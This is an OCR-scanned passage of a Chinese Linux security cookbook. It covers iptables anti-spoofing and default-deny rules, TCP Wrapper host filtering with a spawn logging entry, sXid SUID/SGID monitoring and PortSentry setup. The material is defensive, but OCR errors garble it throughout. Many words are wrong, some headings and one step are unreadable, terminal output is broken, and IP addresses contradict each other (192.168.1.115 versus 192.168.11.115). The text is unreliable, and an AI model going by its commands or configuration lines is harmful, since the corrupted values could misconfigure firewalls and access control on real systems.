然后 介绍 了 如 何在 iptables 中 增加 规则 。 我 们 添加 了 人 允许 本 地 访问 和 向 外 的 活动 连接 的 规则 ， 还 添加 了 人 允许 SSH 连 接 的 规则 。 在 
INPUT 链 中 追加 了 一 条 拒绝 任意 入 站 数据 包 的 规则 ， 防 止 不 匹配 之 前 任 一 规则 的 数据 包 进 入 本 机 。 最 后 ， 叉 介绍 了 保存 并 自动 
加 载 规则 的 工具 iptables-persistent。 


[1] ”iptables 的 表 包 括 预 定义 的 filter 表 、nat 表 、mangle 表 以 及 用 户 自 定义 的 表 ， 每 个 表 包 含 多 条 链 ， 而 每 条 链 包 含 多 条 过 滤 规 则 。 


E 


在 iptables 命 命令 中 ， 默 认 情 


6.3 阻止 地 址 伪 丢 


IP 地 址 伪 六 是 攻击 者 向 服务 器 发 送 恶 意 数 据 包 时 经 常 使 用 的 一 种 技术 ， 它 用 虚假 的 IP 地 址 构造 数据 包 ， 常 用 于 友 动 拒绝 服务 
攻击 (Denial of Service, DoS) 。 


准备 工作 

如 果 希 望 阻止 IP 伪 六 ， 那 么 我 们 站 先 需要 从 以 往 尝 试 连 接 的 虚假 连接 中 得 到 一 个 1P 地 址 或 域名 的 列表 ， 然 后 运用 下 面 的 方法 
进行 阻止 。 
操作 指南 

我 们 将 生成 一 个 基本 的 iptables 规 则 集 ， 以 限制 除 必需 之 外 的 所 有 入 站 的 数据 包 。 


1. 首 先 要 设立 允许 数据 包 进 入 loopback 接 口 的 规则 ， 使 本 系统 的 各 个 服务 可 以 相互 之 间 正 常 通信 ， 这 对 服务 器 的 正常 运行 
十 分 必要 。 可 以 使 用 下 列 合 令 实现 : 


iptables -A INPUT -i lo -j ACCEPT 


rootüsshserver:-£ iptables -A INPUT -i lo -j ACCEPT 
root@sshserver:~# iptables -L -v 
Chain INPUT (policy ACCEPT 1 packets, 67 bytes) 
pkts bytes target prot opt in out source destination 


0 0 ACCEPT all -- lo any anywhere anywhere 


Chain FORWARD (policy ACCEPT 0 packets, O0 bytes) 
pkts bytes target prot opt in out source destination 


Chain OUTPUT (policy ACCEPT 1 packets, 67 bytes) 
pkts bytes target prot opt in out source destination 


2. 为 本 地 系统 发起 的 连接 创建 规则 ， 命 令 如 下 : 


iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j 
ACCEPT 
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root@sshserver:~# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED - 


j ACCEPT 
root@sshserver:~# iptables -L 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 
ACCEPT all -- anywhere anywhere 
ACCEPT all -- anywhere anywhere 


ctstate RELATED ,ES 


TABLISHED 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 


rootgsshserver :~# 


3. 下 面 创建 一 个 可 用 于 iptables 的 新 链 ， 命 名 为 blocked_ip， 用 尸 可 以 按 自 己 襄 好 对 其 命名 。 命 令 如 下 : 


iptables -N blocked ip 
该 链 用 来 存放 阻止 IP 伪 装 的 规则 。 

4. 在 生成 blocked_ip 链 之 后 ， 使 用 下 列 命令 将 它 插入 到 iptables 的 INPUT 链 : 

iptables -I INPUT 2 -j blocked ip 

注意 ， 这 里 我 们 使 用 数字 “2” 指明 了 blocked ip 在 INPUT 链 中 的 位 序 ， 即 从 INPUT 链 头 开始 数 的 第 二 位 。 
5. 接 下 来 ， 我 们 根据 要 阻止 的 虚假 1P 地 址 向 blocked ip 链 添加 规则 。 命 令 如 下 : 

iptables -A blocked ip -s 192.168.1.115 -j DROP 


这 里 我 们 假设 192.168.11.115 是 一 个 虚假 IP 地 址 ， 将 它 增 加 a 到 blocked_ip 链 中 。 你 可 以 使 用 自己 想 阻 塞 的 IP 地 址 替换 
192.168.11.115， 如 果 有 更 多 需要 被 阻塞 的 IP 地 址 ， 那 么 需要 参考 上 面 的 命令 ， 逐 一 将 这 些 地 址 追加 到 blocked_ip 链 中 。 


6. 增 加 完毕 后 ， 查 看 一 下 iptables 中 的 规划， 命令 如 下 : 
iptables -L 


下 图 显示 了 命令 执行 结果 ， 可 以 在 图 片 的 底部 看 到 来 自 |P 地 址 192.168.1.115 的 所 有 数据 包 将 被 丢弃 。 这 里 既 可 以 指定 单个 
iP 地 址 ， 也 可 以 指定 一 个 IP 地 址 沁 围 。 


root@sshserver:~# iptables -L 
Chain INPUT (policy ACCEPT) 
prot opt source destination 
all -- anywhere anywhere 
blocked ip all -- anywhere anywhere 
ACCEPT all -- anywhere anywhere Ctstate RELATED,ES 
TABLISHED 


Chain FORWARD (policy ACCEPT) 


target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 


Chain blocked ip (1 references) 
prot opt source destination 
all -- 3192.168.1.115 anywhere 


7. 我 们 还 可 以 编辑 /etc/host.conf 文 件 来 防止 iP 欺骗 。 使 用 任意 文本 编辑 工具 打开 它 ， 这 里 使 用 nano 工 具 : 
nano /etc/host.conf 


在 打开 的 文件 中 增加 或 编辑 以 下 几 行 : 


orderbind,hosts 


nospoof on 


# The "order" line is only used by old versions of the C library. 
order hosts,bind 


这 里 的 “nospoof on” 选 项 表示 将 执行 IP 地 址 的 比较 操作 。 本 地 主机 会 通过 主机 名 查找 对 应 的 iP 地址， 并 将 查 到 的 IP 地 址 
与 该 主机 友 来 的 数据 包 中 的 源 IP 地 址 进行 比较 ， 如 果 不 一 怪 ， 则 说 明 访 IP 地址 是 一 个 伪造 的 IP 地 址 ， 系 统 会 友 出 一 个 虚假 地 址 管 


全 
Lo 
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为 了 阻止 某 个 虚假 IP 地 址 或 其 他 类 型 的 IP 地 址 ， 我 们 再 次 使 用 iptables 作 为 默认 防火 墙 。 通 过 设立 规则 ， 人 允许 本 地 到 本 地 的 
内 部 访问 和 本 地 出 站 的 数据 连接 。 我 们 还 在 iptables 中 创建 了 一 个 链 ， 用 于 阻止 所 有 的 虚假 IP 地 址 。 我 们 将 该 链 插入 到 iptables 
的 INPUT 规 则 链 中 。 


我 们 可 以 向 表 中 写 入 需要 被 阻塞 的 IP 地 址 ， 防 火 墙 将 目 动 阻塞 对 应 IP 发 来 的 数据 包 。 此 外 ， 我 们 还 使 用 了 /etc/host.conf 文 
件 来 保护 系统 防止 IP 欺 骗 。 


6.4 j—BUNXATUE 


Linux 系 统管 理 员 最 重要 的 任务 之 一 是 控制 网 络 服务 的 访问 。 大 多 数 时 候 ， 较 好 的 选择 是 仅 人 允许 必要 的 网 络 服务 连接 ， 而 阻 
止 其 他 所 有 入 站 流量 。 


准备 工作 


这 里 我 们 仍然 使 用 iptables， 不 需要 安 痰 其 他 程序 包 。 下 面 的 实验 中 需要 使 用 一 个 有 超级 用 尸 权限 的 账号 ， 但 最 好 不 要 使 用 


root, 
操作 指南 


我 们 将 配置 iptables， 阻 止 除 服务 器 已 经 初始 化 的 网 络 连 接 之 外 的 所 有 连接 (例如 已 经 友 出 的 网 页 请 求 和 咽 应 ， 或 是 已 经 局 
动 的 程序 包 更 新 或 软件 下 载 等 ) 。 
1. 与 之 前 实验 中 的 例子 类 似 ，iptables 的 第 一 条 规则 应 设置 为 允许 本 地 数据 通信 。 运 行 下 列 命 令 实现 : 


iptables -A INPUT -i lo -j ACCEPT 


rootüsshserver:-3 iptables -A INPUT -i lo -j ACCEPT 

root@sshserver:~# iptables -L -v 

Chain INPUT (policy ACCEPT 1 packets, 67 bytes) 

pkts bytes target prot opt in out source destination 


6 日 ACCEPT all -- lo any anywhere anywhere 


Chain FORWARD (policy ACCEPT © packets, © bytes) 
pkts bytes target prot opt in out source destination 


Chain OUTPUT (policy ACCEPT 1 packets, 67 bytes) 
pkts bytes target prot opt in out source destination 


2. 第 二 条 规则 应 设置 允许 所 有 出 站 连接 相关 的 网 络 流量 。 这 其 中 包含 了 由 于 本 地 系统 友 起 连接 而 来 自 远 程 服务 器 的 响应 。 命 
令 如 下 : 


iptables -A INPUT -m conntrack --ctstate RELATED,ESTABLISHED -j 
ACCEPT 


root@sshserver:~# iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED - 
j ACCEPT 
root@sshserver:~# iptables -L 
Chain INPUT (policy ACCEPT) 
target prot opt source destination 
ACCEPT all -- anywhere anywhere 
-- anywhere anywhere ctstate RELATED,ES 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
root(üsshserver :~# 


3. 接 下 来 ， 我 们 将 增加 一 条 规则 ， 人 允许 “超时 (Time Exceeded) ICMP 消 息 入 站 。 这 对 于 限时 连接 很 重要 。 命 令 如 下 : 


iptables -A INPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT 
4. 之 后 ， 再 增加 一 条 允许 来 自 远 程 服务 器 的 “目标 不 可 达 ” (Destination Unreachable) ICMP 消 息 入 站 ， 命 令 如 下 : 
iptables -A INPUT -p icmp -m icmp --icmp-type 3/4 -j ACCEPT 


5. 接 着 ， 增 加 一 条 规则 ， 人 允许 ping 请 求 /响应 (ICMP Echo 消息 ) 入 站 ， 保 证 一 些 需要 使 用 ping 的 Web 服 务 的 正常 使 用 和 系 
统 连 接 的 活跃 。 


iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT 


6. 当 增加 完 上 面 的 规则 后 ， 运 行 下 列 命 令 检查 一 下 iptables 当 前 的 规则 : 


iptables -L 


rootüsshserver:- iptables -A INPUT -p icmp -m icmp --icmp-type 11 -j ACCEPT 
root@sshserver:~# iptables -A INPUT -p icmp -m icmp --icmp-type 3/4 -j ACCEPT 
root@sshserver:~# iptables -A INPUT -p icmp -m icmp --icmp-type 8 -j ACCEPT 
root@sshserver:~# iptables -L 

Chain INPUT (policy ACCEPT) 

target prot opt source destination 

ACCEPT all -- anywhere anywhere 

ACCEPT all -- anywhere anywhere ctstate RELATED,ES 
TABLISHED 

ACCEPT icmp -- anywhere anywhere icmp time-exceeded 
ACCEPT icmp -- anywhere anywhere icmp fragmentation 
-needed 

ACCEPT icmp -- anywhere anywhere icmp echo-request 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 
root(üsshserver : 


7. 下 面 创 建 一 个 包含 入 站 规则 和 网 络 服务 的 iptables 链 allowed_ip。 命 令 如 下 : 
iptables -N allowed ip 
把 allowd ip 添加 到 iptables 的 INPUT 链 中 
iptables -A INPUT -j allowed ip 
8. 为 了 能 够 访问 SSH 服 务 器 ， 可 以 运行 下 列 命 令 在 allowed_ip 中 增加 一 条 规则 : 
iptables -A allowed ip -p tcp --dport 22 -j ACCEPT 
9. 现 在 查看 一 下 iptables 的 规则 ， 会 有 如 下 结果 : 


iptable -L 


rootüsshserver:-£ iptables -A allowed ip -p tcp --dport 22 -j ACCEPT 


rootüsshserver:-:f iptables -L 
Chain INPUT (policy ACCEPT) 
prot opt source 

anywhere 

anywhere 


anywhere 
anywhere 


anywhere 


destination 
anywhere 
anywhere 


anywhere 
anywhere 


anywhere 


ctstate RELATED,ES 


icmp time-exceeded 
icmp fragmentation 


icmp echo-request 


all anywhere anywhere 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 


Chain allowed ip (1 references) 

prot opt source destination 

tcp -- anywhere anywhere tcp dpt:ssh 
rootüsshserver :~# 


10. 当 根据 需要 将 那些 准许 入 站 的 规则 添加 完毕 之 后 ， 还 需 添 加 一 条 规则 ， 拒 绝 所 有 上 述 规则 之 外 的 数据 包 通 过 防火 墙 。 命 
令 如 下 : 


iptables -A INPUT -j REJECT --reject-with icmp-host-unreachable 


根据 该 规则 ， 当 任何 主机 尝试 连接 服务 器 时 ， 将 得 到 一 个 “主机 不 可 达 ” (Host Unreachable) 的 ICMP 消 息 ， 这 样 主机 


将 终止 该 连接 请 求 。 
11. 在 增加 完 所 有 规则 后 ， 查 看 iptables 将 有 如 下 结果 : 


iptables -L 


root@sshserver:~# iptables -L 
Chain INPUT (policy ACCEPT) 
prot opt source destination 
all -- anywhere anywhere 
anywhere anywhere ctstate RELATED ,ES 


anywhere anywhere icmp time-exceeded 
anywhere anywhere icmp fragmentation 


anywhere anywhere icmp echo-request 
allowed ip anywhere anywhere 
REJECT all anywhere anywhere reject-with icmp-h 
ost-unreachable 


Chain FORWARD (policy ACCEPT) 
target prot opt source destination 


Chain OUTPUT (policy ACCEPT) 
target prot opt source destination 


Chain allowed ip (1 references) 


target prot opt source destination 
ACCEPT tcp -- anywhere anywhere tcp dpt:ssh 


原理 解析 


为 了 在 服务 器 上 阻塞 所 有 入 站 网 络 流量 且 人 允许 出 站 的 网 络 连 接 ， 我 们 再 次 使 用 了 Linux 系 统 默 认 安 北 的 iptables 防 火 墙 。 


在 设 定 防火 墙 规则 时 ， 为 了 保证 服务 器 内 部 通信 及 服务 的 功能 正常 ， 我 们 允许 本 地 访问 通过 防火 墙 ; 为 了 保持 出 站 连接 活 
跃 , 我们 增加 了 规则 以 允许 “超时 “目标 不 可 达 ” 和 “Echo” 等 三 种 ICMP 消 息 入 站 。 


之 后 我 们 开始 考虑 是 否 允 许 特定 网 络 服务 的 入 站 流量 ， 例 如 SSH 或 来 自 某 个 客户 端 地 址 的 网 络 流量 。 为 此 ， 我 们 创建 了 一 个 
内 含 可 信任 IP 地 址 和 可 开放 网 络 服 务 的 链 (日 名 单 ) ， 并 将 其 加 入 到 INPUT 规 则 链 中 。 


最 后 ,我 们 增加 了 一 条 规则 ， 拒 绝 所 有 不 匹配 上 述 规则 的 数据 包 入 站 。 


6.5 ”配置 使 用 TCP Wrapper 


通过 访问 控制 来 保护 服务 器 是 一 项 至 天 重要 的 安全 措施 ， 这 也 是 设立 服务 器 时 的 必要 工作 。 利 用 访问 控制 工具 TCP 
Wrapper， 我 们 可 以 仅 允 许 外 部 主机 访问 那些 已 经 配置 并 文 持 TCP Wrapper 的 网 络 服务 。 


准备 工作 


为 了 演示 实验 步 又， 我 们 需要 两 全 连接 在 一 个 网 络 中 、 能 够 通过 ping 测 试 连通 的 Linux 系 统 主机 ， 一 人 台 作 为 服务 器 ， 另 一 台 
EEP. (在 下 面 实 验 中 ， 服 务 器 的 I|P 地 址 是 192.168.1.107， 客 己 闯 的 IP 地 址 是 192.168.1.106。 服 务 器 端 安 半 了 ssH 服 务 
器 程序 ， 客 户 疹 安 对 9SH 客 户 端 程序 。 ) 
操作 指南 

Linux 系 统 提供 了 多 种 用 于 网 络 服务 访问 控制 的 工具 ，TCP Wrapper 是 其 中 一 种 ， 它 为 Linux 系 统 提供 了 一 个 额外 的 保护 
层 。 下 面 我 们 就 看 一 看 如 何 配置 TCP Wrapper， 为 不 同 主机 定义 访问 控制 策略 。 


1. 在 使 用 TCP Wrapper 前 ,需要 检查 某 个 程序 是 否 支持 TCP Wrapper。 本 书 以 SSH 服 务 器 程序 为 例 ，SSH 服 务 器 的 可 执行 
程序 为 sshd。 我 们 先 查 看 可 执行 程序 所 在 的 路 径 ， 运 行 下 列 命 令 : 


which sshd 


root@sshserver:~# which sshd 
/usr/sbin/sshd 


rootQsshserver:-it B 


2. 接 下 来 ， 使 用 ldd 程 序 检查 SSH 程 序 对 TCP Wrapper 的 兼容 性 。 


ldd /usr/sbin/sshd 


rootüsshserver:-:t ldd /usr/sbin/sshd 
linux-gate.so.1 => (0xb77cd000) 
libwrap.so.8 => /lib/i386-linux-gnu/libwrap.so.0 (0xb7729000) 
libpam.so.0 => /lib/i386-linux-gnu/libpam.so.0 (0xb771b000) 
libselinux.so.1 => /lib/i386-linux-gnu/libselinux.so.1 (0xb76fb800) 
libpthread.so.0 => /lib/i386-linux-gnu/libpthread.so.0 (0xb76e0008) 


libcrypto.so.1.0.0 -» /lib/i386-linux-gnu/libcrypto.so.1.0.0 (0xb7535000 


libutil.so.1 => /lib/i386-linux-gnu/libutil.so.1 (0xb7531080) 

libz.so.1 => /lib/i386-linux-gnu/libz.so.1 (0xb751b000) 

libcrypt.so.1 => /lib/i386-linux-gnu/libcrypt.so.1 (0xb74e9008) 
libgssapi krb5.s0.2 => /usr/lib/i386-linux-gnu/libgssapi krb5.s0.2 (0xb7 


如 果 在 上 述 输 出 中 存在 libwrap.so 的 内 容 ， 那 就 意味 着 该 程序 支持 TCP Wrapper, 

3. 当 SSH 客 尸 端 通过 TCP Wrapper 连 接 服 务 器 并 时 ， 忆 会 按 顺 序 检查 下 列 两 个 文件 : 
/etc/hosts.allow: 如 果 文 件 中 存在 与 当前 访问 相 匹 配 的 规则 ， 那 么 访问 将 被 允许 ; 

: /etc/hosts.deny: 如 果 文 件 中 存在 与 当前 访问 相 匹 配 的 规则 ， 那 么 访问 将 被 拒绝 。 

4. 如 果 在 上 述 两 个 文件 中 都 没有 找到 与 之 匹配 的 规则 ， 那 么 访问 将 被 允许 。 

5. 现 在 尝试 在 不 增加 任何 规则 的 情况 下 连接 SSH 服 务 器 ， 可 以 从 下 图 中 看 出 连接 是 成 功 的 。 


root@mykerberos:~# ssh tajinderg192.168.1.107 

The authenticity of host '192.168.1.107 (192.168.1.187)' can't be established. 
ECDSA key fingerprint is 31:9d:b4:6e:ab:ed:d0:0f:14:28:6c:df:eb:fb:1f:ob. 

Are you sure you want to continue connecting (yes/no)? yes 

Warning: Permanently added '192.168.1.107' (ECDSA) to the list of known hosts. 
tajinderg192.168.1.107's password: 

Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation: M https://help.ubuntu.com/ 


New release '14.04.3 LTS' available. 


Run 'do-release-upgrade' to upgrade to it. 


Last login: Tue Jan 5 16:48:08 2016 from tj-dev-client.local 
tajinder(üsshserver:-$ 


6. 假 设 现 在 要 拒绝 来 自 某 个 特定 IP 地 址 的 SSH 访 问 ， 我 们 可 以 编辑 /etc/hosts.deny 文 件 ， 如 下 图 所 示 ， 将 客户 端的 地 址 
192.168.1.106 添 加 为 拒绝 的 地 址 : 


/etc/hosts.deny: list of hosts that are not allowed to access the system. 
See the manual pages hosts access(5) and hosts options(5). 


Example: ALL: some.host.name, .some.domain 
ALL EXCEPT in.fingerd: other.host.name, .other.domain 


The PARANOID wildcard matches any host whose name does not match its 
address. 


You may wish to enable this to ensure any programs that don't 
validate looked up hostnames still leave understandable logs. In past 
versions of Debian this has been the default. 

ALL: PARANOID 


192.168.1.106] 


7. 试 着 从 上 述 IP 地 址 连接 SSH 服 务 器 ， 访 问 请 求 将 被 拒绝 ， 并 显示 如 下 错误 : 


root@mykerberos:~# ssh tajinder192.168.1.107 
ssh exchange identification: Connection closed by remote host 
rootümykerberos:-: B 


8. 如 果 想 允许 所 有 客户 端 访 问 所 有 服务 器 ， 那 么 ， 既 可 以 采用 在 上 述 两 个 文件 中 不 增加 任何 规则 的 方法 ， 也 可 以 采用 
在 /etc/hosts.allow 文 件 中 增加 下 列 语句 的 方法 : 


ALL ALL 


9.8 ERAB ASYTAE ELIT RIXEL PIESHERS 2 Pim V3 E] PITE RUBROS , BEA nITEAE/etc/hosts.allow Sz EFRIBIZT 213858) : 


/etc/hosts.allow: list of hosts that are allowed to access the system. 
See the manual pages hosts access(5) and hosts options(5). 


hi 

# 

# 

# Example: ALL: LOCAL @some_netgroup 

# ALL: .foobar .edu EXCEPT terminalserver .foobar .edu 
hi 
# 


ALL : 192.168.1.106 


10. 如 果 想 允许 来 自 某 个 特定 网 络 ， 除 特定 IP 地 址 192.168.1.100 之 外 的 所 有 客户 端 发 起 SSH 访 问 ， 那 么 可 以 
在 /etc/hosts.allow 文 件 中 增加 或 更 改 下 列 语句 : 


/etc/hosts.allow: list of hosts that are allowed to access the system. 
See the manual pages hosts access(5) and hosts options(5). 


Example: ALL: LOCAL f@some netgroup 
ALL: .foobar.edu EXCEPT terminalserver.foobar.edu 


192.168.1.100 - DENY 
192.168.1.8/255.255.255.0 


11. 在 完成 上 述 步 又 之 后 ， 保 存 并 关闭 文件 ， 然 后 尝试 使 用 SSH 访 问 ， 会 得 到 如 下 报错 信息 。 


root@mykerberos:~# ssh tajinder@192.168.1.101 

ssh exchange identification: Connection closed by remote host 
root@mykerberos:~# ifconfig ethe 192.168.1.102 
root@mykerberos:~# ssh tajinder@192.168.1.101 
tajinder(1192.168.1.181's password: 

Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686) 


* Documentation: Mhttps://help.ubuntu.com/ 


New release '14.04.3 LTS' available. 
Run 'do-release-upgrade' to upgrade to it. 


Last login: Tue Jan 19 02:40:55 2016 from 192.168.1.100 
tajinder(sshserver:-S B 


我 们 可 以 看 到 ， 当 客户 端 I|P 地 址 为 192.168.1.100 时 ， 访 问 被 拒绝 ， 在 修改 客户 端 |P 地 址 为 192.168.1.102 之 后 ， 访 问 被 允许 
。 这 意味 着 该 网 络 中 除 特 定 1P 地 址 外 的 所 有 客户 端 都 被 允许 访问 SSH 服 务 器 。 


12. 上 述 步 又 在 /etc/hosts.allow 文 件 中 定义 了 网 络 服 务 的 访问 控制 规则。 然而 ， 在 服务 器 端 ， 我 们 并 不 清楚 哪个 客 尸 端 何 时 
同 服 务 器 友 出 连接 请 求 ， 所 以 需要 建立 一 个 记录 所 有 客户 端 访问 行为 的 日 志 ， 可 以 按照 如 下 图 所 示 的 方法 编辑 /etc/hosts.allow 


fetc/hosts.allow: list of hosts that are allowed to access the system. 
See the manual pages hosts access(5) and hosts options(5). 


Example: ALL: LOCAL f@some netgroup 
ALL: .foobar.edu EXCEPT terminalserver.foobar.edu 


: 192.168.1.103 : spawn /bin/echo '"/bin/date' from %h > /conn.log : 


人 在 上 图 中 ， 关 键 字 “spawn” 定 义 了 对 于 来 自 客 户 端 的 连接 请 求 ， 服 务 器 总 会 根据 指定 参数 来 显示 连接 细节 ， 并 将 显示 内 
容 记 录 人 在 文件 conn.log 中 。 


13. 现 在 当 我 们 查看 conn.log 文 件 内 容 时 ， 会 看 到 如 下 细节 : 


rootüsshserver:/3 cat conn. log 
Tue Jan 19 05:32:54 IST 2016 from 192.168.1.103 


root(üsshserver : /# 


all 


文件 中 包含 了 来 目 某 个 IP 地 址 的 客 尸 端 何 时 请 求 连 接 服务 器 的 日 志 记 录 。 如 果 需 要 捕获 更 多 的 细节 信息 ， 可 以 通过 设 定 丰 


的 spawn 命 令 参 数 来 实现 。 


原理 解析 


本 节 我 们 使 用 TCP Wrapper 对 与 之 兼容 的 应 用 程序 进行 访问 控制 。 首 先 使 用 lIdd 工 具 检 查 应 用 程序 是 否 支 持 TCP 
Wrapper; 然后 根据 需求 在 文件 /etc/host.allow 或 /etc/host.deny 文 件 中 增加 相应 规则 。 我 们 增加 了 限制 某 个 特定 IP 地 址 或 整 
个 网 络 访问 程序 的 规划。 还 在 TCP Wrapper 中 使 用 spawn 命 令 设置 日 志文 件 ， 记 录 所 有 客户 端 或 应 用 程序 的 连接 请 求 。 
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本 章 将 讨论 如 下 主题 : 
: Linux 的 SXid 工 具 
: PortSentry 


: 使 用 Squid 代 理 服务 器 


: OpenSSL 服 务 器 
: Tripwire 
: Shorewall 


7.1 Linux 的 sXid 工 具 


Linux 中 的 文件 通常 有 读 、 写 、 执 行 权限 。 除 这 些 权限 之 外 ， 还 有 一 些 特殊 权限 ， 如 SUID (Set owner User ID) 、 
SGID (Set Group ID up on execution) 权限 。 这 些 权限 使 得 用 户 以 目 己 的 身份 登录 ， 但 以 文件 实际 拥有 者 的 身份 执行 文件 
(文件 的 实际 拥有 者 可 能 是 root) 。 


SsXid 是 SUID/SGID 监 视 工具 。 使 用 该 工具 可 跟 蹊 文件 或 文件 夹 的 SUID/SGID 属 性 变更 情况 。 


准备 工作 


使 用 SXid 工 具 前 需要 在 Linux 系 统 上 安 半 SXid 软 件 包 ， 可 使 用 apt-get 命 令 来 安 丢 ， 或 者 下 载 该 包 并 手动 配置 及 安 丢 。 


JR Farg 


在 开始 监视 SUID/SGID 文 件 及 文件 夹 属性 前 ， 先 安 濠 SsXid 包 ， 然 后 按照 用 户 需 求 配置 该 工具 ，。 
1. 首 先 安 六 sXid 软 件 包 ， 通 过 运行 下 述 命令 进行 : 
apt-get install sxid 


root@tj-dev:~# apt-get install sxid 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
The following extra packages will be installed: 

exim4 exim4-base exim4-config exim4-daemon-light heirloom-mailx 
Suggested packages: 

eximond exim4-doc-html exim4-doc-info spf-tools-perl swaks 
Recommended packages: 

mailx 
The following NEW packages will be installed: 

exim4 exim4-base exim4-config exim4-daemon-light heirloom-mailx sxid 
© upgraded, 6 newly installed, © to remove and 334 not upgraded. 
Need to get 1,988 kB of archives. 
After this operation, 4,334 kB of additional disk space will be used. 
Do you want to continue [Y/n]? y 


2. 安 委 完 成 后 ， 根 据 需 求 编 辑 /etc/sxid.conf 文 件 。 可 在 任 一 编辑 器 中 打开 该 文件 ， 如 下 所 示 : 
nano /etc/sxid.conf 
3. 在 配置 文件 中 ， 查 找 下 面 截图 中 的 文字 行 : 


# Who to send reports to 
EMAIL = "root" 


石 用 户 和 希望 将 SXid 运 行 过 程 中 监控 到 的 变化 结果 及 送 到 指定 邮箱 ， 那 么 需要 将 E-mail 的 值 设 置 为 该 邮箱 地 址 。 


小 


.下 一 步 ， 查 找 KEEP_LOGS 文 字 行 并 将 其 赋值 为 用 己 选 择 的 数值 ， 该 数值 定义 了 保存 的 日 志文 件数 量 。 


How many logs to keep 


KEEP LOGS = 3 


5. 如 果 希 望 在 sXid 没 呈 控 到 变化 时 仍 能 记录 日 志 ， 那 么 将 ALWAYS_NOTIFY 设 为 “yes”。 


# Always send reports, even when there are no changes? 


ALWAYS NOTIFY - "no" 


6. 可 以 为 SEARCH 选 项 定义 一 系列 用 空格 隔 开 的 目录 ， 作 为 sXid 搜 索 的 起 始点 。 


如 果 希 望 把 某 目 录 排 除 在 搜索 之 外 ， 可 以 通过 EXCLUDE 选 项 措 定 。 


# Where to begin our file search 
SEARCH = "/usr /usr/local/share" 


# Which subdirectories to exclude from searching 
EXCLUDE - "/usr/Llocal" 


假设 要 搜索 目录 /usr/local/share， 但 叉 把 /usr/local 目 录 排 除了 ， 那 么 仍 会 搜索 /usr/local/share。 这 种 方式 在 排除 主 目录 
但 指定 其 中 一 个 特定 子 目录 时 非常 有 用 。 


7. 在 /etc/sxid.conf 文 件 中 还 有 更 多 选项 可 根据 用 户 需求 进行 配置 。 当 编辑 完成 后 ， 保 仔 并 天 闭 文 件 。 
8. 使 用 下 述 命令 手动 运行 SXid 进 行 现场 检 枉 : 


sxid -c /etc/sxid.conf -k 


root@tj-dev:~# sxid -c /etc/sxid.conf -k 
: 4.20130802 
: Mon Feb 1 21:18:03 2016 
: tj-dev 
: /root 
: /proo /mnt /cdrom /floppy 


: /home 
: /home /tmp 


No changes found 


其 中 ， 选 项 “-c” 用 于 指定 配置 文件 ， 人 否则 将 使 用 黑 认 的 配置 文件 。 选 项 “-Kk” 表示 运行 该 工具 。 
原理 解析 


首先 安装 sXid 软 件 包 ， 然 后 根据 需求 编辑 /etc/sxid.conf 文 件 进行 配置 。 
配置 完成 后 ， 手 动 运行 SXid 工 具 执 行 现场 检查 。 


还 可 以 在 crontab 中 添加 一 个 条 目 ， 按 用 户 定 义 的 周期 目 动 运行 SXid。 


1.2 PortSentry 


保护 系统 免 遭 网 络 入 侵 是 系统 管理 员 的 重点 工作 ， 这 也 是 本 书 讨 论 PortSentry 的 目的 ， 因 为 该 工具 可 检测 到 针对 主机 系统 的 
扫 换 行为， 并 以 用 户 选择 的 方式 进行 啊 应 。 


为 演示 PortSentry 的 实现 及 用 法 ,我 们 需要 运行 在 同一 网 络 上 并 且 可 以 相互 ping 通 的 两 个 系统 。 

同时 ， 需 要 在 作为 客户 端的 系统 上 安 半 Nmap 包 ， 在 另 一 个 作为 服务 器 的 系统 上 安 洲 并 配置 PortSentry。 
使 用 下 述 命令 安 闪 Nmap 包 : 
apt-get install nmap 


root@client:~# apt-get install nmap 

Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

The following NEW packages will be installed: 


nmap 
© upgraded, 1 newly installed, O to remove and 326 not upgraded. 


Need to get 1,623 kB of archives. 

After this operation, 6,876 kB of additional disk space will be used. 

Get:1 http://in.archive.ubuntu.com/ubuntu/ precise/main nmap 1386 5.21-1.1ubunt 
1 [1,623 kB] 

Fetched 1,623 kB in 4s (331 kB/s) 


操作 指南 


1. 在 第 一 个 系统 上 使 用 下 述 命令 安装 PortSentry 包 : 


apt-get install portsentry 


root@server:~# apt-get install portsentry 
Reading package lists... Done 
Building dependency tree 
Reading state information... Done 
Suggested packages: 
logcheck 
The following NEW packages will be installed: 
portsentry 
© upgraded, 1 newly installed, © to remove and 334 not upgraded. 
Need to get 74.2 kB of archives. 
After this operation, 315 kB of additional disk space will be used. 
Get:1 http://in.archive.ubuntu.com/ubuntu/ precise/universe portsentry i386 1.2- 
12 [74.2 kB] 
Fetched 74.2 kB in 1s (49.7 kB/s) 
Preconfiguring packages ... 
Selecting previously unselected package portsentry. 
(Reading database ... 65% 


2. 在 安装 过 程 中 会 弹出 一 个 窗口 ， 显 示 PortSentry 的 相关 信息 ， 单 击 <OK> 继 续 安 装 : 


个 
r3 


| Configuring portsentry 


PortSentry does not block anything by default. 


Please note that by default PortSentry takes no action against potential 
attackers. It only dumps messages into /var/log/syslog. To change this 
edit /etc/portsentry/portsentry.conf. 


You may also want to check: 
[etc/default/portsentry (daemon startup options) and 
[etc/portsentry/portsentry.ignore.static (hosts/interfaces to ignore) 


For further details see the portsentry(8) and portsentry.conf(5) 
manpages. 


3. zc RI, PortSentryZFi ais TCPRHUDPsmSL]. SLEA Phase xj/var/log/syslogxtf£7t& £s, LAISüEPortSentryze 
对 端口 进行 了 监视 : 


grep portsentry /var/log/syslog 


